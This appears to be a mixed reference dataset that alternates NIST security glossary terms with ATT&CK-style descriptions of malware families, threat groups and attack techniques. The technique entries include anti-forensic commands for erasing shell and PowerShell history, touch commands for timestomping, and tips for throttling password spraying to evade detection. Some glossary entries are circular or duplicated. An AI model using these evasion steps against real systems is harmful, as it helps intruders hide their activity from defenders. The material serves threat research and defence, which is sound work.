Definition: Designated Authorizing Official; A senior organization official that has been given the authorization to authorize the reliability of an issuer.

Term: Entropy Source
Definition: A combination of a noise source (e.g., thermal noise or hard drive seek times), health tests, and an optional conditioning component. The entropy source produces random bitstrings to be used by an RBG.

Term: Cyber Threat
Definition: Any circumstance or event with the potential to adversely impact agency operations (including mission function, image, or reputation), agency assets or individuals through an information system via unauthorized access, destruction, disclosure, modification of data, and/or denial of service.

Name: Spark
Type: malware
Description: Spark is a Windows backdoor and has been in use since as early as 2017.

Term: card reader
Definition: An electronic device that connects an integrated circuit card and the card applications therein to a client application.

Term: privacy‐utility tradeoff
Definition: The fundamental tension between privacy and accuracy. Adding more noise increases privacy but reduces accuracy, and vice‐versa.

Term: information security continuous monitoring (ISCM) program
Definition: A program established to collect information in accordance with organizational strategy, policies, procedures, and pre-established metrics, utilizing readily available information in part through implemented security controls.

Term: Cryptographic checksum
Definition: A mathematical value created using a cryptographic algorithm that is assigned to data and later used to test the data to verify that the data has not changed.

Term: <em>Independent</em>
Definition: Two random variables X and Y are independent if they do not convey information about each other. Receiving information about X does not change the assessment of the probability distribution of Y (and vice versa).

Term: model extraction
Definition: A type of privacy attack that extracts details of the model architecture and/or parameters.

Term: crypto agility for an enterprise
Definition: A capacity to seamlessly and rapidly transition away from vulnerable cryptographic algorithms and adopt new, stronger ones without incurring significant changes to their infrastructure or experiencing unnecessary disruptions.

Term: Watering Hole
Definition: Watering hole attacks involve attackers compromising one or more legitimate Web sites with malware in an attempt to target and infect visitors to those sites.

Term: risk analysis
Definition: See risk analysis

Term: Derived PIV Application
Definition: A standardized application residing on a removable, hardware cryptographic token that hosts a Derived PIV Credential and associated mandatory and optional elements.

Term: capability
Definition: See Capability, Security.

Term: RA
Definition: The process of identifying risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of a system. Part of risk management, incorporates threat and vulnerability analyses, and considers mitigations provided by security controls planned or in place. Synonymous with risk analysis.

Term: Dual_EC_DRBG
Definition: A DRBG originally specified in SP 800-90A that has been withdrawn.

Term: <em>CIPH-1K(X)</em>
Definition: The inverse cipher function of the block cipher algorithm under the key K applied to the data block X.

Term: security risk
Definition: The effect of uncertainty on objectives pertaining to asset loss and the associated consequences.

Term: metadata
Definition: The information associated with a key that describes its specific characteristics, constraints, acceptable uses, ownership, etc.; sometimes called the key's attributes.

Term: disciplined oscillator
Definition: An oscillator whose output frequency is continuously adjusted (often through the use of a phase locked loop) to agree with an external reference. For example, a GPS disciplined oscillator (GPSDO) usually consists of a quartz or rubidium oscillator whose output frequency is continuously adjusted to agree with signals broadcast by the GPS satellites.

Term: Authentication Information
Definition: Information used to establish the validity of a claimed identity.

Term: Manageability
Definition: Per NISTIR8062: Providing the capability for granular administration of personally identifiable information, including alteration, deletion, and selective disclosure.

Term: PIN
Definition: A memorized secret typically consisting of only decimal digits.

Name: Component Object Model
Type: attack-pattern
Description: Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE). Remote COM execution is facilitated by Remote Services such as Distributed Component Object Model (DCOM).

Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and Visual Basic. Specific COM objects also exist to directly perform functions beyond code execution, such as creating a Scheduled Task/Job, fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.

Name: Fysbis
Type: malware
Description: Fysbis is a Linux-based backdoor used by APT28 that dates back to at least 2014.

Term: encryption
Definition: The process of transforming plaintext into ciphertext using a cryptographic algorithm and key.

Term: Web Server
Definition: A computer that provides World Wide Web (WWW) services on the Internet. It includes the hardware, operating system, Web server software, and Web site content (Web pages). If the Web server is used internally and not by the public, it may be known as an “intranet server”.

Term: <em>Alphabet</em>
Definition: A finite set of two or more symbols.

Term: <strong>Should</strong>
Definition: Used to indicate a strong recommendation but not a requirement of this standard. Ignoring the recommendation could lead to undesirable results.

Term: countermeasures
Definition: Any action, device, procedure, technique, or other measure that reduces the vulnerability of or threat to a system.

Term: Random Bit Generator (RBG)
Definition: A device or algorithm that outputs a sequence of bits that appear to be statistically independent and unbiased. Also, see Random number generator.

Term: <strong>Should</strong>
Definition: Used to indicate a strong recommendation but not a requirement of this standard. Ignoring the recommendation could result in undesirable results.

Name: PLAINTEE
Type: malware
Description: PLAINTEE is a malware sample that has been used by Rancor in targeted attacks in Singapore and Cambodia.

Term: KMPS
Definition: A document or set of documentation that describes (in detail) the organizational structure, responsible roles, and organization rules for the functions identified in the associated cryptographic Key Management Policy (see [IETF RFC 3647]).

Term: U
Definition: One party in a key-establishment scheme.

Term: bit string
Definition: An ordered sequence of bits.

Term: Byte
Definition: An integer from the set {0, 1, 2, …, 255}.

Term: module
Definition: The set of hardware, software, and/or firmware that implements approved cryptographic functions (including key generation) that are contained within the cryptographic boundary of the module.

Name: Gather Victim Org Information
Type: attack-pattern
Description: Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.

Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Phishing or Trusted Relationship).

Term: Capability List
Definition: A list attached to a subject ID specifying what accesses are allowed to the subject.

Term: removable media device
Definition: See portable storage device.

Name: Ryuk
Type: malware
Description: Ryuk is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. Ryuk shares code similarities with Hermes ransomware.

Term: information steward
Definition: An agency official with statutory or operational authority for specified information and responsibility for establishing the controls for its generation, collection, processing, dissemination, and disposal.

Term: CSF Category
Definition: A group of related cybersecurity outcomes that collectively comprise a CSF Function.

Term: Trusted Platform Module (TPM)
Definition: A tamper-resistant integrated circuit built into some computer motherboards that can perform cryptographic operations (including key generation) and protect small amounts of sensitive information, such as passwords and cryptographic keys.

Term: CBEFF Patron
Definition: An organization that has defined a standard or specification incorporating biometric data objects that is CBEFF compliant

Term: mission assurance
Definition: A process to protect or ensure the continued function and resilience of capabilities and assets, including personnel, equipment, facilities, networks, information and information systems, infrastructure, and supply chains, critical to the execution of organizational mission-essential functions in any operating environment or condition.

Name: ShadowPad
Type: malware
Description: ShadowPad is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by APT41, but has since been observed to be used by various Chinese threat activity groups.

Term: RSA
Definition: An algorithm approved in FIPS 186 for digital signatures and in SP 800-56B for key establishment.

Name: gh0st RAT
Type: malware
Description: gh0st RAT is a remote access tool (RAT). The source code is public and it has been used by multiple groups.

Term: XML Schema
Definition: A language for describing the defining the structure, content and semantics of XML documents.

Name: Password Spraying
Type: attack-pattern
Description: Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. 

Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:

* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP & 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / Terminal Services (3389/TCP)
* HTTP/HTTP Management Services (80/TCP & 443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.

In order to avoid detection thresholds, adversaries may deliberately throttle password spraying attempts to avoid triggering security alerting. Additionally, adversaries may leverage LDAP and Kerberos authentication attempts, which are less likely to trigger high-visibility events such as Windows "logon failure" event ID 4625 that is commonly triggered by failed SMB connection attempts.

Term: key distribution center (KDC)
Definition: COMSEC facility generating and distributing key in electronic form.

Name: TA578
Type: intrusion-set
Description: TA578 is a threat actor that has used contact forms and email to initiate communications with victims and to distribute malware including Latrodectus, IcedID, and Bumblebee.

Name: CaddyWiper
Type: malware
Description: CaddyWiper is a destructive data wiper that has been used in attacks against organizations in Ukraine since at least March 2022.

Term: risk analysis
Definition: The process of identifying risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of a system.

Term: cryptographic key
Definition: A parameter used in conjunction with a cryptographic algorithm that determines its operation. 
Examples applicable to this Standard include: 
1. The computation of a digital signature from data, and 
2. The verification of a digital signature.

Term: Finite Field Cryptography
Definition: Finite field cryptography.

Term: login
Definition: The establishment of an authenticated session between a person and a system. Also known as “sign in,” “log on,” or “sign on.”

Term: Range
Definition: The maximum possible distance for communicating with a wireless network infrastructure or wireless client.

Name: WellMail
Type: malware
Description: WellMail is a lightweight malware written in Golang used by APT29, similar in design and structure to WellMess.

Term: Tunnel VPN
Definition: An SSL connection that allows a remote user to securely access a wide variety of protocols and applications, through a tunnel that is running under SSL, via a Web browser, generally augmented by a client application or plug-in..

Name: SPACEHOP Activity
Type: campaign
Description: SPACEHOP Activity is conducted through commercially leased Virtual Private Servers (VPS), otherwise known as provisioned Operational Relay Box (ORB) networks. The network leveraged for SPACEHOP Activity enabled China-nexus cyber threat actors – such as APT5 and Ke3chang – to perform network reconnaissance scanning and vulnerability exploitation. SPACEHOP Activity has historically targeted entities in North America, Europe, and the Middle East.

Term: security control provider
Definition: An organizational official responsible for the development, implementation, assessment, and monitoring of common controls (i.e., security controls inherited by information systems). 
See common control provider.

Name: SLOWDRIFT
Type: malware
Description: SLOWDRIFT is a backdoor used by APT37 against academic and strategic victims in South Korea.

Name: Network Topology
Type: attack-pattern
Description: Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning or Phishing for Information. Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Technical Databases or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services).

Term: CSP
Definition: A trusted entity that issues or registers subscriber authenticators and issues electronic credentials to subscribers. A CSP may be an independent third party or issue credentials for its own use.

Term: DoS
Definition: The prevention of authorized access to resources or the delaying of time-critical operations. (Time-critical may be milliseconds or it may be hours, depending upon the service provided.)

Term: SC
Definition: The characterization of information or an information system based on an assessment of the potential impact that a loss of confidentiality, integrity, or availability of such information or information system would have on organizational operations, organizational assets, individuals, other organizations, and the Nation.

Term: local access
Definition: Access to an organizational information system by a user (or process acting on behalf of a user) communicating through a direct connection without the use of a network.

Term: training data control
Definition: A capability in which an attacker controls some or all of the training data of a machine learning model.

Name: OilBooster
Type: malware
Description: OilBooster is a downloader written in Microsoft Visual C/C++ that has been used by OilRig since at least 2022 including against target organizations in Israel to download and execute files and for exfiltration.

Term: risk framing
Definition: A characteristic used in a risk model as an input to determining the level of risk in a risk assessment.

Term: Key wrapping
Definition: A method of protecting secret keying material (along with associated integrity information) that provides both confidentiality and integrity protection when using symmetric-key algorithms.

Term: Service Interface
Definition: The abstract boundary that a service exposes. It defines the types of messages and the message exchange patterns that are involved in interacting with the service, together with any conditions implied by those messages.

Term: 0<i>x</i>00
Definition: An all-zero octet. In this Recommendation, it is suggested for use as an ending indicator of a variable length data field, which holds the ASCII code for a character string.

Term: digital twin instance
Definition: A digital data structure, object, or entity in a computer software environment that represents a specific physical instance of a real-world object whose type or class is given by an associated digital twin definition.

Term: reference data
Definition: Cryptographic material used in the performance of a cryptographic protocol, such as an authentication or a signing protocol. The reference data length is the maximum length of a password or PIN. For algorithms, the reference data length is the length of a key.

Term: checksum
Definition: A value that (a) is computed by a function that is dependent on the contents of a data object and (b) is stored or transmitted together with the object, for detecting changes in the data.

Term: mode of iteration
Definition: A method for iterating the multiple invocations of a pseudorandom function in order to derive the keying material with a required length.

Term: token
Definition: Something the claimant possesses and controls (typically a cryptographic module or password) that is used to authenticate the claimant’s identity. In previous editions of SP 800-63, this was referred to as a token.

Term: information leakage
Definition: The intentional or unintentional release of information to an untrusted environment.

Name: MacMa
Type: malware
Description: MacMa is a macOS-based backdoor with a large set of functionalities to control and exfiltrate files from a compromised computer. MacMa has been observed in the wild since November 2021. MacMa shares command and control and unique libraries with MgBot and Nightdoor, indicating a relationship with the Daggerfly threat actor.

Name: CANONSTAGER
Type: malware
Description: CANONSTAGER is a loader known to be leveraged by Mustang Panda and was first observed utilized in 2025. Mustang Panda utilizes DLL side-loading to execute within the victim environment prior to delivering a follow-on malicious encrypted payload. CANONSTAGER leverages Thread Local Storage (TLS) and Native Windows APIs within the victim environment to elude detections. CANONSTAGER also hides its code utilizing window procedures and message queues.

Name: Clear Command History
Type: attack-pattern
Description: In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.

On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Adversaries may delete their commands from these logs by manually clearing the history (<code>history -c</code>) or deleting the bash history file <code>rm ~/.bash_history</code>. 

Adversaries may also leverage a Network Device CLI on network devices to clear command history data (<code>clear logging</code> and/or <code>clear history</code>). On ESXi servers, command history may be manually removed from the `/var/log/shell.log` file.

On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the <code>PSReadLine</code> module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.

The <code>PSReadLine</code> command history tracks the commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code> by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.

Adversaries may run the PowerShell command <code>Clear-History</code> to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the <code>ConsoleHost_history.txt</code> file. Adversaries may also delete the <code>ConsoleHost_history.txt</code> file or edit its contents to hide PowerShell commands they have run.

Term: Compliance Mapping
Definition: The process of correlating CCE settings defined in a source data stream with the security control identifiers defined in [NIST SP 800-53 Rev. 4].

Term: Forbidden PLMNs
Definition: A list of Public Land Mobile Networks (PLMNs) maintained on the SIM that the mobile phone cannot automatically contact, usually because service was declined by a foreign provider.

Name: Mail Protocols
Type: attack-pattern
Description: Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 

Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

Term: Communications Module
Definition: The sub-component of a Smart Meter responsible for AMI communications between Smart Meters in the field and the Network Management System. The Communications Module may or may not be a separate electronic element, and/or may include the HAN Interface.

Name: Inception
Type: intrusion-set
Description: Inception is a cyber espionage group active since at least 2014. The group has targeted multiple industries and governmental entities primarily in Russia, but has also been active in the United States and throughout Europe, Asia, Africa, and the Middle East.

Term: Key-wrapping key
Definition: A key used as an input to a key-wrapping method; see SP 800-38F.

Term: Function
Definition: One of the main components of the Framework. Functions provide the highest level of structure for organizing basic cybersecurity activities into Categories and Subcategories. The five functions are Identify, Protect, Detect, Respond, and Recover.

Term: SCAP component
Definition: A logical unit of data expressed using one or more of the SCAP component specifications.

Term: authenticate
Definition: Security measures designed to establish the validity of a transmission, message, or originator, or a means of verifying an individual’s authorization to receive specific categories of
information.

Term: MUD-Capable
Definition: An IoT device that is capable of emitting a MUD uniform resource locator (URL) in compliance with the MUD specification.

Term: domain
Definition: A logical structure, group or sphere of influence over which control is exercised.

Term: Information Assurance Officer
Definition: See information systems security officer (ISSO). 
Note: DoDI 8500.01 has transitioned from the term information assurance (IA) to the term cybersecurity. This could potentially impact IA related terms. 
Rationale: Term is deprecated in favor of ISSO.

Name: Timestomp
Type: attack-pattern
Description: Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.

In Windows systems, both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file. `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.

Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.

Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.

In Linux systems and on ESXi servers, threat actors may attempt to perform timestomping using commands such as `touch -a -m -t <timestamp> <filename>` (which sets access and modification times to a specific value) or `touch -r <filename> <filename>` (which sets access and modification times to match those of another file).

Timestomping may be used along with file name Masquerading to hide malware and tools.

Term: managed interface
Definition: An interface within an information system that provides boundary protection capability using automated mechanisms or devices.

Name: Junk Code Insertion
Type: attack-pattern
Description: Adversaries may use junk code / dead code to obfuscate a malware’s functionality. Junk code is code that either does not execute, or if it does execute, does not change the functionality of the code. Junk code makes analysis more difficult and time-consuming, as the analyst steps through non-functional code instead of analyzing the main code. It also may hinder detections that rely on static code analysis due to the use of benign functionality, especially when combined with Compression or Software Packing.

No-Operation (NOP) instructions are an example of dead code commonly used in x86 assembly language. They are commonly used as the 0x90 opcode. When NOPs are added to malware, the disassembler may show the NOP instructions, leading to the analyst needing to step through them.

The use of junk / dead code insertion is distinct from Binary Padding because the purpose is to obfuscate the functionality of the code, rather than simply to change the malware’s signature.

Term: authenticated- encryption function
Definition: A function that encrypts plaintext into ciphertext and provides a means for the associated authenticated-decryption function to verify the authenticity and, therefore, the integrity of the data.

Term: process step
Definition: A reference to one of the 6 steps in the ISCM process defined in NIST SP 800-137.

Name: Clop
Type: malware
Description: Clop is a ransomware family that was first observed in February 2019 and has been used against retail, transportation and logistics, education, manufacturing, engineering, automotive, energy, financial, aerospace, telecommunications, professional and legal services, healthcare, and high tech industries. Clop is a variant of the CryptoMix ransomware.

Term: <strong>Shall</strong>
Definition: The term used to indicate a requirement of a Federal Information Processing Standard (FIPS) or a requirement that needs to be fulfilled to claim conformance with this Recommendation. Note that <strong>shall</strong> may be coupled with <strong>not</strong> to become <strong>shall not</strong>.

Term: Resolver
Definition: Software that retrieves data associated with some identifier.

Name: POLONIUM
Type: intrusion-set
Description: POLONIUM is a Lebanon-based group that has primarily targeted Israeli organizations, including critical manufacturing, information technology, and defense industry companies, since at least February 2022. Security researchers assess POLONIUM has coordinated their operations with multiple actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS), based on victim overlap as well as common techniques and tooling.

Term: Anomalous Event Response and Recovery Management
Definition: An ISCM capability that ensures that both routine and unexpected events that require a response to maintain functionality and security are responded to (once identified) within a time frame that prevents or reduces the impact (i.e., consequences) of the events to the extent possible.

Name: Nomadic Octopus
Type: intrusion-set
Description: Nomadic Octopus is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. Nomadic Octopus has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.

Name: Cuba
Type: malware
Description: Cuba is a Windows-based ransomware family that has been used against financial institutions, technology, and logistics organizations in North and South America as well as Europe since at least December 2019.

Term: Service Description
Definition: A set of documents that describe the interface to and semantics of a service.

Name: SSH Hijacking
Type: attack-pattern
Description: Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.

In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.

SSH Hijacking differs from use of SSH because it hijacks an existing SSH session rather than creating a new session using Valid Accounts.

Term: time bomb
Definition: Resident computer program that triggers an unauthorized act at a predefined time.

Term: Examination
Definition: A technical review that makes the evidence visible and suitable for analysis; as well as tests performed on the evidence to determine the presence or absence of specific data.

Term: Mode of Operation (Mode)
Definition: An algorithm that uses a block cipher algorithm as a cryptographic primitive to provide a cryptographic service, such as confidentiality or authentication.

Name: FunnyDream
Type: malware
Description: FunnyDream is a backdoor with multiple components that was used during the FunnyDream campaign since at least 2019, primarily for execution and exfiltration.

Term: Blockchain implementation
Definition: a specific blockchain.

Term: domain
Definition: A set of systems under common administrative and access control.

Term: Setting the bar
Definition: Setting the bar means that a decision must be made as to the complexity of the material that will be developed; it applies to all three types of learning – awareness, training, and education.

Term: breach
Definition: The loss of control, compromise, unauthorized disclosure, unauthorized acquisition, or any similar occurrence where (1) a person other than an authorized user accesses or potentially accesses personally identifiable information or (2) an authorized user accesses personally identifiable information for an other than authorized purpose.

Term: Manual key distribution
Definition: A non-automated means of transporting cryptographic keys by physically moving a device or document containing the key or key component.

Term: CIO
Definition: Agency official responsible for:

(i) Providing advice and other assistance to the head of the executive
agency and other senior management personnel of the agency to ensure
that information technology is acquired and information resources are
managed in a manner that is consistent with laws, Executive Orders,
directives, policies, regulations, and priorities established by the head of
the agency;
(ii) Developing, maintaining, and facilitating the implementation of a
sound and integrated information technology architecture for the agency;

and
(iii) Promoting the effective and efficient design and operation of all
major information resources management processes for the agency,
including improvements to work processes of the agency.

Term: public-key encryption scheme
Definition: A set of three cryptographic algorithms (KeyGen, Encrypt, and Decrypt) that can be used by two parties to send secret data over a public channel. Also known as an asymmetric encryption scheme.

Term: cleartext
Definition: Information that is not encrypted.

Term: RF Subsystem
Definition: The portion of the RFID system that uses radio frequencies to perform identification and related transactions. The RF subsystem consists of two components: a reader and a tag.

Term: IP
Definition: The Internet Protocol, as defined in IETF RFC 6864, which is the principal communications protocol in the IETF Internet protocol suite for specifying system address information when relaying datagrams across network boundaries.

Name: iKitten
Type: malware
Description: iKitten is a macOS exfiltration agent .

Name: Triton Safety Instrumented System Attack
Type: campaign
Description: Triton Safety Instrumented System Attack was a campaign employed by TEMP.Veles which leveraged the Triton malware framework against a petrochemical organization. The malware and techniques used within this campaign targeted specific Triconex Safety Controllers within the environment. The incident was eventually discovered due to a safety trip that occurred as a result of an issue in the malware.

Name: Troll Stealer
Type: malware
Description: Troll Stealer is an information stealer written in Go associated with Kimsuky operations. Troll Stealer has typically been delivered through a dropper disguised as a legitimate security program installation file. Troll Stealer features code similar to AppleSeed, also uniquely associated with Kimsuky operations.

Term: <em>x -1 mod n</em>
Definition: The multiplicative inverse of the integer x modulo the positive integer n. This quantity is defined if and only if x is relatively prime to n. For the purposes of this Recommendation, y = x-1 mod n is the unique integer satisfying the following two conditions: 1) 0 £ y < n, and 2) 1 = (xy) mod n.

Term: authorized party
Definition: In federation, the organization, person, or entity that is responsible for making decisions regarding the release of information within the federation transaction, most notably subscriber attributes. This is often the subscriber (when runtime decisions are used) or the party operating the IdP (when allowlists are used).

Name: CostaBricks
Type: malware
Description: CostaBricks is a loader that was used to deploy 32-bit backdoors in the CostaRicto campaign.

Term: public key certificate
Definition: A digital representation of information which at least (1) identifies the certification authority issuing it, (2) names or identifies it’s Subscriber, (3) contains the Subscriber’s public key, (4) identifies it’s operational period, and (5) is digitally signed by the certification authority issuing it.

Term: Lineage
Definition: The history of processing of a data element, which may include point-topoint data flows and the data actions performed upon the data element.

Term: 0<i>x</i>00
Definition: An all zero octet.

Term: security control and privacy control
Definition: The means of managing risk, including policies, procedures, guidelines, practices, or organizational structures, which can be of an administrative, technical, management, or legal nature. An attribute assigned to an asset t hat reflects its relative importance or necessity in acheiving or contributing to the achievement of stated goals.

Term: concept relationship style
Definition: An explicitly defined convention for characterizing relationships for a user case. OLIR supports three concept relationship styles: concept crosswalk, set theory relationship mapping, and supportive relationship mapping.

Term: audit record reduction
Definition: A process that manipulates collected audit information and organizes it into a summary format that is more meaningful to analysts.

Term: Tunnel Mode
Definition: An IPsec mode that creates an additional outer IP header for each protected packet.

Name: Tarrask
Type: malware
Description: Tarrask is malware that has been used by HAFNIUM since at least August 2021. Tarrask was designed to evade digital defenses and maintain persistence by generating concealed scheduled tasks.

Term: HMI
Definition: The hardware or software through which an operator interacts with a controller. An HMI can range from a physical control panel with buttons and indicator lights to an industrial PC with a color graphics display running dedicated HMI software.

Term: systems security engineering
Definition: Process that captures and refines security requirements and ensures their integration into information technology component products and information systems through purposeful security design or configuration.

Term: Asset Reporting Format Report
Definition: The collection of all assets, report requests, reports, and relationships for a given instance of ARF.

Term: Authority to Operate
Definition: Authorization to Operate; One of three possible decisions concerning an issuer made by a Designated Authorizing Official after all assessment activities have been performed stating that the issuer is authorized to perform specific PIV Card and/or Derived Credential issuance services.

Term: <em>L</em>
Definition: An integer specifying the length of the derived keying material KOin bits, which is represented as a binary string when it is an input to a key derivation function.

Term: security attribute
Definition: An abstraction that represents the basic properties or characteristics of an entity with respect to safeguarding information. Typically associated with internal data structures—including records, buffers, and files within the system—and used to enable the implementation of access control and flow control policies; reflect special dissemination, handling or distribution instructions; or support other aspects of the information security policy.

Term: attribute
Definition: characteristic or property of an entity that can be used to describe its state, appearance, or other aspect

Name: External Remote Services
Type: attack-pattern
Description: Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management and VNC can also be used externally.

Access to Valid Accounts to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. Access to remote services may be used as a redundant or persistent access mechanism during an operation.

Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.

Adversaries may also establish persistence on network by configuring a Tor hidden service on a compromised system. Adversaries may utilize the tool `ShadowLink` to facilitate the installation and configuration of the Tor hidden service. Tor hidden service is then accessible via the Tor network because `ShadowLink` sets up a .onion address on the compromised system. `ShadowLink` may be used to forward any inbound connections to RDP, allowing the adversaries to have remote access. Adversaries may get `ShadowLink` to persist on a system by masquerading it as an MS Defender application.

Term: Incremental testing
Definition: Testing a system or device to determine that minor changes have not affected its security and intended functionality.

Name: Kessel
Type: malware
Description: Kessel is an advanced version of OpenSSH which acts as a custom backdoor, mainly acting to steal credentials and function as a bot. Kessel has been active since its C2 domain began resolving in August 2018.

Term: subject
Definition: the set of active entities of the system, operating within roles on behalf of individual users.

Term: hybrid security control
Definition: A security control that is implemented in an information system in part as a common control and in part as a system-specific control. 
See Common Control and System-Specific Security Control.

Term: NSA-approved cryptography
Definition: Cryptography that consists of: (i) an approved algorithm; (ii) an implementation that has been approved for the protection of classified information in a particular environment; and (iii) a supporting key management infrastructure.

Term: frequency drift
Definition: An undesired progressive change in frequency with time. Frequency drift can be caused by instability in the oscillator and environmental changes, although it is often hard to distinguish between drift and oscillator aging. Frequency drift may be in either direction (resulting in a higher or lower frequency) and is not necessarily linear.

Term: assessor
Definition: The individual responsible for conducting assessment activities under the guidance and direction of a Designated Authorizing Official. The Assessor is a 3rd party.

Term: secret key
Definition: A cryptographic key that is shared between two or more entities and used with a cryptographic application to process information.

Name: LNK Icon Smuggling
Type: attack-pattern
Description: Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign windows shortcut files. Windows shortcut files (.LNK) include many metadata fields, including an icon location field (also known as the `IconEnvironmentDataBlock`) designed to specify the path to an icon file that is to be displayed for the LNK file within a host directory. 

Adversaries may abuse this LNK metadata to download malicious payloads. For example, adversaries have been observed using LNK files as phishing payloads to deliver malware. Once invoked (e.g., Malicious File), payloads referenced via external URLs within the LNK icon location field may be downloaded. These files may also then be invoked by Command and Scripting Interpreter/System Binary Proxy Execution arguments within the target path field of the LNK.

LNK Icon Smuggling may also be utilized post compromise, such as malicious scripts executing an LNK on an infected host to download additional malicious payloads.

Term: public key certificate
Definition: A digital document issued and digitally signed by the private key of a Certificate authority that binds the name of a Subscriber to a public key. The certificate indicates that the Subscriber identified in the certificate has sole control and access to the private key. See also [RFC 5280].

Term: Enrollment
Definition: The process through which an applicant applies to become a subscriber of a CSP and an RA validates the identity of the applicant on behalf of the CSP. (NIST SP 800-63-3)

Term: Capability, Privilege and Account Management
Definition: See Capability, Privilege and Account Management.

Term: Ephemeral Key
Definition: A cryptographic key that is generated for each execution of a key-establishment process and that meets other requirements of the key type (e.g., unique to each message or session). 
In some cases, ephemeral keys are used more than once within a single session (e.g., for broadcast applications) where the sender generates only one ephemeral key pair per message, and the private key is combined separately with each recipient’s public key.

Name: Operation Spalax
Type: campaign
